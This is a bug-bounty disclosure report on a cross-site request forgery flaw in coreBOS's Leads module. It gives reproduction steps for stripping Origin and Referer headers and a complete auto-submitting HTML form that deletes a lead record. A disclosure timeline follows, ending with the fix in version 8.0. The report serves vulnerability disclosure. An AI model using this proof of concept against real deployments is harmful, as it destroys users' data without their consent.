Cross-Site Request Forgery (CSRF) in tsolucio/corebos

Valid

Reported on

Jul 21st 2022


Description

CSRF is still possible on the Leads module

Detailed Video is attached (Proof of concept).

Tested from: Firefox

URL of Demo : https://demo.corebos.com/index.php?module=Leads&action=index&record=&relmodule=Leads

Proof of Concept

Video Link : https://vimeo.com/732211543

Steps Involved

  1. Create one & after that, intercept the request
  2. Capture the delete request
  3. Remove The headers: Origin, Referer, Sec-Fetch-Site
  4. Add <meta name="referrer" content="no-referrer"> with CSRF-PoC
  5. Done

CSRF-PoC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.corebos.com/index.php" method="POST">
      <input type="hidden" name="&#95;&#95;vt5rftk" value="sid&#58;b523b60fa9a701abf87cd1d76a6facf8ac8f83a0&#44;1658428539" />
      <input type="hidden" name="allselectedboxes" value="" />
      <input type="hidden" name="from&#95;link" value="DetailView" />
      <input type="hidden" name="cbfromid" value="44845" />
      <input type="hidden" name="module" value="Leads" />
      <input type="hidden" name="record" value="44845" />
      <input type="hidden" name="isDuplicate" value="false" />
      <input type="hidden" name="action" value="Delete" />
      <input type="hidden" name="return&#95;module" value="Leads" />
      <input type="hidden" name="return&#95;id" value="" />
      <input type="hidden" name="return&#95;action" value="index" />
      <input type="hidden" name="lead&#95;id" value="44845" />
      <input type="hidden" name="parent&#95;id" value="44845" />
      <input type="hidden" name="email&#95;directing&#95;module" value="" />
      <input type="hidden" name="emailids" value="44845&#64;46&#124;" />
      <input type="hidden" name="pmodule" value="Leads" />
      <input type="hidden" name="cbcustominfo1" value="" />
      <input type="hidden" name="cbcustominfo2" value="" />
       <meta name="referrer" content="no-referrer">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

Cross-site request for the deletion of leads

We are processing your report and will contact the tsolucio/corebos team within 24 hours. 4 months ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 4 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 4 months ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. 4 months ago
Joe Bordes validated this vulnerability 3 months ago
Kiran PP has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kiran PP
3 months ago

Researcher


@maintainer @admin

After fixing, can we track it as a CVE ??

We have sent a fix follow up to the tsolucio/corebos team. We will try again in 7 days. 3 months ago
Joe Bordes marked this as fixed in 8.0 with commit d0bf45 3 months ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation